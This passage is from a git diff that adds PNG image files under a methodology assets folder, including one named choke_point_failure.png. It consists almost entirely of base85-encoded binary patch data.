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

literal 0
HcmV?d00001

diff --git a/src/assets/methodology/choke_point_failure.png b/src/assets/methodology/choke_point_failure.png
new file mode 100644
index 0000000000000000000000000000000000000000..10b1b6cce6504e3c54463ae7474bda1ccb3593fe
GIT binary patch
literal 39659
zcmYg&1z1%5(>AP&lG33x0)kQk(y?@RN=tW3w{(fHfHX)7(%lWxE#2MS^&Y_I|9xJ2
z2@B`U`AyHa^$lvF}LgaW^$xP{A2u`=Uw_xn$&u-m;lN_GqNnv!!*1)3b4tNs~$W$Gii}o!1nO
